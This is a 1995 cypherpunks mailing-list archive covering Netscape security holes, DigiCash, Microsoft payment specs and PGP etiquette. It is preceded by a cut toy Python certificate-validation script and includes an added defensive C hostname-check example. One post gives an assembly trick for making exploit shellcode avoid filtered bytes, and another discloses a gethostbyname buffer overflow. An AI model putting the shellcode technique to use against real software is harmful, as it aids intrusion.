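def issue(issuer, issuer_priv, serial, subject, subject_pub,
          start=date(1995, 9, 1), end=date(1996, 9, 1)):
    """Create a certificate for subject_pub, signed with the issuer's private key."""
    n, d = issuer_priv
    cert = Cert(1, serial, "toy-rsa-sha256", issuer, start, end, subject, subject_pub)
    return replace(cert, signature=pow(digest(cert.tbs(), n), d, n))

def validate(chain, anchors, crls, today):
    """chain[0] is the end entity; each later cert certifies the previous issuer.
    anchors: issuer name -> public key installed out of band.
    crls: issuer name -> set of revoked serial numbers.  Returns (ok, reason)."""
    for i, cert in enumerate(chain):
        if not (cert.not_before <= today <= cert.not_after):
            return False, f"{cert.subject}: outside validity period"
        if cert.serial in crls.get(cert.issuer, set()):
            return False, f"{cert.subject}: serial {cert.serial} revoked by {cert.issuer}"
        if cert.issuer in anchors:
            n, e = anchors[cert.issuer]
        elif i + 1 < len(chain) and chain[i + 1].subject == cert.issuer:
            n, e = chain[i + 1].subject_key
        else:
            return False, f"{cert.subject}: no path to a trusted key"
        if pow(cert.signature, e, n) != digest(cert.tbs(), n):
            return False, f"{cert.subject}: bad signature from {cert.issuer}"
        if cert.issuer in anchors:
            return True, f"anchored at {cert.issuer}"
    return False, "chain ended without reaching a trusted key"

# Constructed scenario: "me" is the root key I installed myself.  I certified
# Alice, Alice certified Bob, and an unrelated CA issued Bob a second, separate
# certificate for the same key.  Every issuer happens to use serial 1.
ME_PUB, ME_PRIV = toy_keypair(61, 31)
ALICE_PUB, ALICE_PRIV = toy_keypair(89, 19)
BOB_PUB, _ = toy_keypair(107, 17)
CA_PUB, CA_PRIV = toy_keypair(127, 13)

ALICE_BY_ME = issue("me", ME_PRIV, 1, "alice", ALICE_PUB)
BOB_BY_ALICE = issue("alice", ALICE_PRIV, 1, "bob", BOB_PUB)
BOB_BY_CA = issue("other-ca", CA_PRIV, 1, "bob", BOB_PUB)
ANCHORS = {"me": ME_PUB}
TODAY = date(1995, 9, 27)

if __name__ == "__main__":
    web = [BOB_BY_ALICE, ALICE_BY_ME]
    print(validate(web, ANCHORS, {}, TODAY))              # reaches my own key
    print(validate([BOB_BY_CA], ANCHORS, {}, TODAY))      # CA I never installed
    print(validate(web, ANCHORS, {"alice": {1}}, TODAY))  # Alice revoked Bob
    forged = replace(BOB_BY_ALICE, subject_key=CA_PUB)    # key swapped after signing
    print(validate([forged, ALICE_BY_ME], ANCHORS, {}, TODAY))
```

[Because every issuer in the scenario reuses serial 1, revoking Alice's
serial 1 rejects only the certificate she issued for Bob; the certificate
"me" issued for Alice under the same number is untouched.]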





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 27 Sep 95 12:32:52 PDT
To: cypherpunks@toad.com
Subject: Re: Fax encryption software
Message-ID: <199509271930.PAA28222@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9509262116.A7081-0100000@netcom7>,
grafolog@netcom.com (Jonathan Blake) wrote:

>        I saw this article in alt.privacy.
>
>        Anybody think the described encryption actually is worth 
>        looking at.

[...]
>We are talking about a 72 bit engine that is more than 
>sufficiently strong for time sensitive general business purposes. 
[...]
>>>It is fully licensed, without restriction for export, by the 
>U.S. 
>>>Department of Commerce. NO PGP WORRIES.

These two statements are mutually exclusive. Snakeoil.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGmmZyoZzwIn1bdtAQFrsQF/edmKXMashWa+yP9E4N/M0c/Rgwa4I6rm
0g0K8TzPc8hl4dP01Euiqcm1LAgHqbiL
=rRO8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 27 Sep 95 07:45:58 PDT
To: cypherpunks@toad.com
Subject: Re: NO weak links in DigiCash system!!!
In-Reply-To: <199509271227.NAA14451@digicash.com>
Message-ID: <Pine.HPP.3.91.950927144813.22239A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


DigiCash's BigMac wrote:

> Feel free to ask us the questions before publicly posting. It will 
> prevent misunderstandings and libel lawsuits.

Libel lawsuits for misunderstandings? 

Ridiculous. Libel threats are very rare on the CP list,
it's one of the list's features. (I can't recollect any such
threat since a well-known Nym was intimidated by LD, more
than a year ago - and that Nym eventually saw the light.)

Go sue yourself.

Mats 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 27 Sep 95 07:57:21 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <Pine.3.89.9509271529.A7869-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't you either create the address in a register, and then do an 
indirect jump through the register, or push it onto the stack and do a 
ret ? You could do something like 

	mov ecx, address + 01010101
	sub ecx, 01010101
	jmp [ecx]

I'm not certain of the format for BSDI assembler, but I presume that's 
possible. You could modify the value you add and subtract to make sure 
there are no netscape-invalid bytes in the compiled code.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 27 Sep 95 14:02:59 PDT
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Hack Microsoft NT C2 Rating?
In-Reply-To: <199509261856.LAA24022@ix6.ix.netcom.com>
Message-ID: <9509272102.AA21900@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>I'm more surprised by the rating since the Orange Book is basically
>for non-networked systems; Red Book rating is _much_ harder, unless
>the NSA's taking a different view of trustability of software encryption 
>for authentication purposes than they used to.

I'm a little sceptical as to the relevance of C2. It is a set of criteria that 
is now very old and concerns military security where people can be told what to 
do. One way in which security systems often fail is in the security structure 
being so suffocating that people have to poke air holes in it so they can 
breathe.

I think that c2 is possibly the limit of orange/red bookishness that is 
reasonable to work to. It is not a trivial level of security however, UNIX 
despite all the claims has never been shipped as C2 secure as standard by a 
mainstream vendor. Even requirements involving trivial effort but which are 
extremely important such as the writing of a users security guide have never 
been taken seriously on any of the UNIX platforms on which I have worked.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 27 Sep 95 15:02:29 PDT
To: cypherpunks@toad.com
Subject: Re: Insecurity in WWW oriented security
In-Reply-To: <9509261509.AA10554@vampire.science.gmu.edu>
Message-ID: <44ceto$7qo@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Story about hospital wanting to use "secure" Netscape deleted.]

On a similar note, just after the unssl announcement, I got email from
someone who works in network security at the Pentagon, saying that
users in his domain were "expressing their desires to use Netscape
to do some sensitive things."

I wonder if anyone's packet-sniffing the Pentagon?

   - Ian "I mean _besides_ the NSA."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 27 Sep 95 10:23:57 PDT
To: cypherpunks@toad.com
Subject: Microsoft & new Internet Security specs
Message-ID: <199509271723.NAA16512@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.prnewswire.com/cnoc/story/569463/18018

> [Company News on Call] [Return to Company Listing]
> [Return to Headlines]
> 
>      MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP
>      IMPROVE SECURITY ON THE INTERNET
> 
>     ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT)
> today announced the publication of two specifications that address key
> Internet security issues.  Software designed with these specifications
> will enable developers to incorporate improved security technology into
> their applications, giving businesses and consumers confidence that
> their transactions and communications will be secure.
>     The two specifications -- Secure Transaction Technology (STT) and
> Private Communication Technology (PCT) -- were published today on the
> Internet.  To help encourage widespread adoption of STT and PCT,
> Microsoft is making the specifications available at no charge to all
> software developers, businesses, card brands and financial institutions
> that want to create STT-compliant and PCT-compliant applications.  Both
> can be found on the Microsoft home page (http//:www.microsoft.com).
>     "We set out a year ago to build STT, a security system that meets
> the strict requirements of the payment-card industry.  STT's design uses
> sophisticated cryptographic techniques to help protect and authenticate
> consumers, merchants and financial institutions that use bank cards to
> conduct business on the Internet," said Craig Mundie, senior vice
> president of the consumer systems division at Microsoft.  "After doing
> so, we felt we could also apply our expertise to the Internet's need for
> general-purpose security.  PCT builds upon Secure Sockets Layer by
> incorporating strong authentication and other technologies we developed
> for STT."
>     STT, jointly developed with Visa International, is supported by the
> Internet Shopping Network, RSA Data Security Inc. and Spyglass Inc.  The
> PCT specification is supported by Cylink Corp., FTP Software Inc.,
> Internet Shopping Network, NetManage Inc., OpenMarket Inc., Spyglass
> Inc. and Starwave Corp.
>     "We cannot afford to have doubt cast over the ability to conduct
> business on the Internet," said Marc Miller, executive vice president of
> marketing and business development for Spyglass Inc.  "We applaud
> Microsoft for approaching the security issue as it should be approached
> -- in an open forum within the Internet community.  Our whole business
> model is based on partnerships.  We're happy to be working with
> Microsoft to provide an open, specifications-based solution to help
> ensure the viability of this exciting new medium."
>     The Secure Transaction Technology specification, jointly developed
> by Microsoft and Visa, is designed to provide a secure method for
> handling credit-card transactions across private and public networks.
> By providing a technology that can be completely integrated with the
> current bank-card system, STT will serve as a reliable payment system
> for software providers to incorporate into their products.  STT also
> preserves the branded transaction relationships that merchants and
> financial institutions have with their customers.
>     The Private Communication Technology specification is designed to
> secure general-purpose business and personal communications on the
> Internet.  PCT includes features such as privacy, authentication and
> mutual identification.  As a secure communications technology, PCT
> builds on the earlier advances embodied in Secure Sockets Layer (SSL).
> PCT enhances SSL by separating authentication from encryption.  This
> means that PCT allows applications to use authentication that is
> significantly stronger than the 40-bit key limit for encryption allowed
> by the U.S. government for export.
>     "The Internet Shopping Network is committed to providing the most
> secure online shopping environment possible," said Boris Putanec, vice
> president of engineering for the Internet Shopping Network.  "STT
> delivers one of the highest levels of security and authentication for
> shopping transactions, boosting electronic commerce."
>     Microsoft plans to incorporate both STT and PCT into its own
> products, such as the Microsoft(R) Internet Explorer 2.0, which ships
> with the Window(R) operating system, and is encouraging other software
> developers to do the same.
>     The specifications released by Microsoft include use of encryption
> capabilities based on technology from RSA Data Security Inc.
>     Founded in 1975, Microsoft is the worldwide leader in software for
> personal computers.  The company offers a wide range of products and
> services for business and personal use, each designed with the mission
> of making it easier and more enjoyable for people to take advantage of
> the full power of personal computing every day.

>     Microsoft is either a registered trademark or trademark in the
> United States and/or other countries.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 27 Sep 95 15:47:24 PDT
To: "cypherpunks@toad.com>
Subject: Re: Security Update news release
Message-ID: <199509272302.SAA03139@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

> >Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> >data used to keep PGP secure,  Netscape will be banned from my computer
> >and every computer I am responsible for. -- For good.
> 
> This is the second person who has expressed this sentiment. I don't
> understand it. If you believe that the possibility of randseed.bin
> getting out is dangerous, then why do you leave it online? Do you
> really trust every piece of software you run, every piece of software
> that can possibly access your machine over the net, to not look at
> that file?

I'm still running MSDOS, so I suppose net connectivity isn't much
of an issue :)  At any rate, I set my randseed.bin to a length of 0
and then made it un-writable, so that new random bits have to be
generated every time.  It's not too much of a trouble for me;
most of my PGP use is just signing messages to certain interested
parties.  How would Netscape handle the fact that there aren't any
random bits here?

Dave "old bits, new bits, red bits, blue bits"
- --
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
Opinions this ludicrous are mine.  Rational ones will cost you.
Heh

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Wed, 27 Sep 95 14:51:06 PDT
To: cypherpunks@toad.com
Subject: Schnorr patent
Message-ID: <9509271751.memo.21703@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that PKP is dead, does anyone know how to contact C. Schnorr about his patent?

Peace ..Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 27 Sep 95 17:58:32 PDT
To: cypherpunks@toad.com
Subject: Re: First Payments WG Meeting Announcement
Message-ID: <v02110100ac8fa1a77e94@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


FYI-  the FSTC E-payment Working Group meeting is happening at the W3 meeting
on the day before the meeting itself. The meeting is being held at the OSF
facilities.

>The World Wide Web Consortium is holding a Workshop on payments. The workshop
>is intended to be a small, technically oriented meeting of its payments working
>group. Although it is a members only event I am willing to listen to special
>pleading, alternatively companies may wish to join the consortium at our
>extremely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
>details.
>
>--
>Phillip M. Hallam-Baker            Not speaking for anyone else
>hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
>Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!
>
>ANNOUNCE: First W3C Payments WG Meeting, October 11
>
>----------------------------------------------------------------------------
>
>What: 1st W3C Payment WG Meeting
>
>Where: MIT EECS, Grier Room 34-401 (subject to change)
>
>When: Wednesday October 11, 9am - 5pm
>
>Who: W3C Member Representatives ONLY
>
>URL: First W3C Payments WG Meeting
>
>W3C is making progress on supporting electronic payments on the web. This WG
>Meeting has been called to foster discussion and feedback between W3C and
>its members. Discussion will focus on proposals to the W3C for payment
>protocols, interfaces, and e-commerce support.
>
>The agenda for the electronic payment workshop is still being settled. At
>the current time we have confirmed presentations by VISA, IBM, W3C, and the
>Financial Services Technical Consortium (FSTC). Additional invitations have
>been issued, and suggestions for additional presentations would be welcome.
>Contact Phillip Hallam-Baker (hallam@w3.org) or Jim Miller (JMiller@w3.org)
>with suggestions.
>
>There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th.
>Contact Rohit Khare for details (khare@w3.org)
>
>To RSVP for the Payments WG Meeting, email the coordinator, Phillip
>Hallam-Baker (hallam@w3.org) or call 617/258-5967 by 5 October. This
>workshop is aimed at technologists; please include a brief description of
>any relevant payments work you or your organization are involved in.
>
>This is a preliminary announcement of the date and time only. We have
>arranged for hotel rooms at the Kendall Square Marriott. To qualify for the
>MIT discount, notify Susan Hardy (susan@w3.org).
>
>For a review of the Consortium's plans, see W3C's report on Electronic
>Payment Schemes and the Third W3C Security Workshop.

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 27 Sep 95 15:17:52 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: [Q] Checkfree Wallet
Message-ID: <199509272217.SAA22791@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm writing about security and the Internet and in particular about
the Netscape bugs. 

I'm interested if anyone knows technical details about the Checkfree
Wallet system. Have they made code publicly available, etc.

BTW. The Wallet system is supposed to be using ~768 bit public key
system and it is reported to be exportable. All decryption is done at
Checkfree Corp. Users encode only the credit info, the WWW server
signs the file and forwards it to Checkfree who will decrypt and
process the credit card data.

I've been told no credit card info is kept on any servers except for
machines inside of Checkfree's network and that keep credit card
numbers on file there.

Please let me know if you know anything. Unless otherwise indicated,
any information will be assumed for publication. Background information
is welcome as well.

/hawk 	habs@panix.com

	writing for NetGuide Mag.


-- 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 27 Sep 95 19:25:48 PDT
To: cypherpunks@toad.com
Subject: Information, We want information
Message-ID: <v02110101ac8fb5e74078@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


I am in immediate need of info on the liabilities of BSD type systems, and in
particular the BorderWare products.

I heard that in the BorderWare product itself, there are several  recently
discovered potential "holes"...

I have a particular interest in both the Attack MO against the BSD
platforms in general and the Border products in particular...

Please do not send the reply to the lists but to me personally
(todd@lgt.com). I will summarize if I get enough info to be worth the
effort.

Any comments?

Thanks In Advance...
Todd Glassey
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 27 Sep 95 18:29:14 PDT
To: cypherpunks@toad.com
Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system)
Message-ID: <199509280129.TAA07801@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Originally to Marcel van der Peijl at DigiCash.


- ------- Forwarded Message

To: "Marcel van der Peijl" <bigmac@digicash.com>
Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system)
Date: Wed, 27 Sep 1995 19:20:16 -0600
From: Bryce Wilcox <bryce@colorado.edu>


- -----BEGIN PGP SIGNED MESSAGE-----

Marcel--  I'm sorry that my comments upset you so much, but I do not 
believe that they were unwarranted.  It is true that the cyberbucks demo 
is insecure in some ways, such as using insecure e-mail.  On the other 
hand your response that the demo is not about e-mail, it is about E-cash, 
and that you don't have the manpower to invest in making those extraneous 
things secure, is a good one and I am satisfied.


The only thing I wish I had done differently was to make the title of the
message "weak links in cyberbucks demo".  There are, as far as I am aware, no
weak links in the DigiCash system.


I sincerely wish your company the best success, although I fear that
MicroSoft and Visa and the like will successfully market inferior systems by
use of their money and mindshare.  In fact, a large part of the reason that
I chose to sell BAP via a cybershop was to draw more attention to Ecash.  
I hope it is working.  I guess if you have about a two-week queue for free
cyberbucks, then maybe in a week I will get a whole lot of BAP purchases.
:-)


Regards,

Bryce


signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

- -----END PGP SIGNATURE-----

- ------- End of Forwarded Message


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 27 Sep 95 20:22:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <v02120d06ac8f74e7796e@[199.2.22.120]>
Message-ID: <199509280317.UAA05182@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> As for objections about how worthwhile this is, it's pretty clear
> that a patch will be available for this problem before we can finish
> and publicize an exploit.

	Which makes an exploit all the more useful. If an exploit was
published well before a patch would be available, people would make
accusations that the exploit publisher was aiding
vandalism. (Warranted or not, 8lgm gets these accusations, etc.)
Publishing the exploit after the patch is available means more of an
incentive to go get the patched version. I for one, haven't picked up
the patched netscape yet.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Wed, 27 Sep 95 20:21:08 PDT
To: cypherpunks@toad.com
Subject: Re: Microsoft & new Internet Security specs
Message-ID: <v03003502ac8fc289516f@[199.254.15.47]>
MIME-Version: 1.0
Content-Type: text/plain


> [Company News on Call] [Return to Company Listing]
> [Return to Headlines]
>
>      MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP
>      IMPROVE SECURITY ON THE INTERNET
>
>     ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT)
> today announced the publication of two specifications that address key
> Internet security issues.
[ blah, blah, blah ]
> Both can be found on the Microsoft home page (http//:www.microsoft.com).
>
I command-clicked on that URL, and my mail program asked me what program I
wanted to use to resolve "http//" URLs :-)

The correct URL is, of course, <http://www.microsoft.com>
-- Marshall

Marshall Clow
mclow@coyote.csusm.edu

I'm an engineer. I make slides no one can read. Sometimes I eat donuts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Wed, 27 Sep 95 12:24:37 PDT
To: asgaard@sos.sll.se
Subject: Re: Re: NO weak links ...
In-Reply-To: <Pine.HPP.3.91.950927144813.22239A-100000@cor.sos.sll.se>
Message-ID: <199509271924.UAA00338@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom <asgaard@sos.sll.se> wrote:
>Libel lawsuits for misunderstandings? 
>
>Ridiculous. Libel threats are very rare on the CP list,
>it's one of the list's features. (I can't recollect any such
>threat since a well-known Nym was intimidated by LD, more
>than a year ago - and that Nym eventually saw the light.)

Oh come on. Don't take everything so seriously. This was not an explicit 
and/or real threat.

>Go sue yourself.
Suing myself is as unlikely as suing someone else. I am not American and 
do not know my lawyer on a first-name basis. You as fellow-European 
should understand this.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 20:38:34 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <ac8f659c0302100475d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM 9/27/95, Travis Corcoran wrote:

>I'm not sure whether you're objecting to someone asked for your key,
>or the fact that they did it through a semi-automated process.

If you go back to my original message you'll see that I was discussing the
rising number of spams, advertisements, and "automatically-generated"
posts.

What I call a robo-warning was this:

"  P.S.  This mail was composed by my mailreading sftwr, which
        automatically scans incoming mail, looking for failed keyserver
        requests, and prompts me whether it should automatically send this msg
        on my behalf.  If there is a bug w this sftwr (for example, you never
        PGP sign your msgs, so this entire msg makes no sense), or if you're
        interested in the software itself (mail-secure.el: a package in lisp
        for emacs; this is just one of the many crypto/privacy related things
        it does) please mail the author of this package ( tjic@openmarket.com)
        for details.


As to whether I needed to respond to your robo-warning about how your
automatic scan of incoming mail produced some kind of Signature Failure
Condition Red at your end, I just ignored your message. (As others will
attest, when people ask me for my key in a non-automated way, I usually
send it to them. I often regret this, as they then send me PGP-encrypted
mail with innocuous contents---the same reason PRZ hates to get PGP mail.)

My _overall_ point was not to attack Travis C., who I don't think I even
mentioned by name, but to point out that great care must be taken in
running automated mail-response programs (including "vacation" programs,
"I'm away from my terminal" messages, and these kinds of automated PGP
messages).

Finally, since Travis is making a fairly big deal over my citing of his
post (though anonymously, as I recall), I'd like to see the post he claims
I signed. If it has a PGP signature, it's probably an obvious spoof or
satire.


>If anyone has a constructive suggestion as to how this mail could be
>changed to convey more information or to be less "threatening", please
>mail me.

Simple, don't bother to ask in the first place. Or ask informally, in
ordinary English. Skip the "This mail was composed by my mailreading sftwr,
which automatically scans incoming mail, looking for failed keyserver
requests..." nonsense.

On a list with well over 1000 people, I don't need some fraction of them
running their own "key etiquette agents" inspecting my posts for
conformance to their preferences.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 20:51:49 PDT
To: cypherpunks@toad.com
Subject: Patch release of Netscape available
Message-ID: <14494.812260307@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX,
Macintosh and Windows executables. Note that these executables only
support 40-bit RC4. We are working out a mechanism to be able to
upgrade the 128-bit versions that is acceptable to the U.S.
government.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 21:02:43 PDT
To: cypherpunks@toad.com
Subject: NIS library code exposure
Message-ID: <14539.812260953@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Once again I speak for myself and not Netscape.

While investigating one of the crashes we ended up decompiling some of
the code in the C library. It turns out that in some UNIX systems, the
code in gethostbyname_yp will copy the hostname argument onto a stack
local buffer. That buffer appears to be of size MAXHOSTNAMELEN. [This
is very efficient code at destroying the stack: it does not use strcpy
or sprintf; there is an inline loop copying characters until it finds a
NUL.]

An unstated (in any documentation I could find) limitation on calls to
gethostbyname is that the "name" parameter must be a limited size
string for it to work at all. I suspect this bug has been in the NIS
(nee YP) code for some time.

Do you have any daemons that run as root and do networking? Are you
sure that all of them check the length of the host name before passing
it to gethostbyname?

[Avoid the fencepost error: MAXHOSTNAMELEN is really the size of the
buffer and not the maximal string length. You need room for the
trailing NUL.]

We have not looked into the networking libraries that are typically
found on a PC or Macintosh. The exposure may also be present there.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation
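
An added example, not part of the original message and not Netscape's or any vendor's code: the caller-side length check the post above asks about, together with a bounded copy that avoids the fencepost error it warns of. The names check_hostname, checked_gethostbyname and copy_hostname are hypothetical, and the fallback value for MAXHOSTNAMELEN is an assumption.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>       /* gethostbyname, struct hostent */
#include <sys/param.h>   /* MAXHOSTNAMELEN on most UNIX systems */

#ifndef MAXHOSTNAMELEN
#define MAXHOSTNAMELEN 256   /* assumption: fallback where the system does not define it */
#endif

typedef enum { HOST_OK = 0, HOST_NULL, HOST_EMPTY, HOST_TOO_LONG } host_check_t;

/* Length of s, but never reads more than `limit` bytes.
 * Returns `limit` when no NUL was found in that window. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Caller-side check: MAXHOSTNAMELEN is the buffer size, so the longest
 * acceptable name has MAXHOSTNAMELEN - 1 characters plus the trailing NUL. */
host_check_t check_hostname(const char *name)
{
    if (name == NULL)
        return HOST_NULL;
    if (name[0] == '\0')
        return HOST_EMPTY;
    if (bounded_len(name, (size_t)MAXHOSTNAMELEN) >= (size_t)MAXHOSTNAMELEN)
        return HOST_TOO_LONG;
    return HOST_OK;
}

/* Wrapper for daemons: an oversized name never reaches the resolver library. */
struct hostent *checked_gethostbyname(const char *name, host_check_t *why)
{
    host_check_t rc = check_hostname(name);
    if (why != NULL)
        *why = rc;
    if (rc != HOST_OK)
        return NULL;
    return gethostbyname(name);
}

/* Library-side fix: the inline copy loop with a bound.
 * Always NUL-terminates dst; returns 0 if src fit, -1 if it was truncated. */
int copy_hostname(char *dst, size_t dstsize, const char *src)
{
    size_t i;
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    for (i = 0; i < dstsize - 1 && src[i] != '\0'; i++)
        dst[i] = src[i];
    dst[i] = '\0';
    return src[i] == '\0' ? 0 : -1;
}

int main(void)
{
    /* Constructed sample inputs: one name that exactly fits, one a byte too long. */
    char longest_ok[MAXHOSTNAMELEN];
    char one_too_many[MAXHOSTNAMELEN + 1];
    char buf[MAXHOSTNAMELEN];
    host_check_t why = HOST_OK;

    memset(longest_ok, 'a', sizeof longest_ok - 1);
    longest_ok[sizeof longest_ok - 1] = '\0';
    memset(one_too_many, 'a', sizeof one_too_many - 1);
    one_too_many[sizeof one_too_many - 1] = '\0';

    printf("%d chars: check=%d copy=%d\n", MAXHOSTNAMELEN - 1,
           (int)check_hostname(longest_ok),
           copy_hostname(buf, sizeof buf, longest_ok));
    printf("%d chars: check=%d copy=%d\n", MAXHOSTNAMELEN,
           (int)check_hostname(one_too_many),
           copy_hostname(buf, sizeof buf, one_too_many));

    if (checked_gethostbyname(one_too_many, &why) == NULL && why == HOST_TOO_LONG)
        puts("oversized name rejected before reaching the resolver");
    return 0;
}
```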




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 20:56:07 PDT
To: cypherpunks@toad.com
Subject: Re: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag
Message-ID: <ac8f6b4b04021004cba0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:21 PM 9/27/95, Travis Corcoran wrote:
>Summary:
>
>        This message tosses out an idea for conveying within an { email |
>        usenet } message the datum "the author of this message prefers to
>        receive PGP encrypted communications" in a standard machine-readable
>        form.

I don't dislike this idea, so my comments here are only possible routes for
those who want to get PGP-encrypted mail.

First, I think Hal Finney was offering at one time to remail the list to
anyone in encrypted form (encrypted on his machine(s) to their PGP key, of
course). This would increase the volume of PGP mail, of course.

Second, others could make the same offer.

Third, remailers could be used.

Now encrypting a public list doesn't do much, of course, but it does
increase the amount of encrypted traffic.


--Tim May

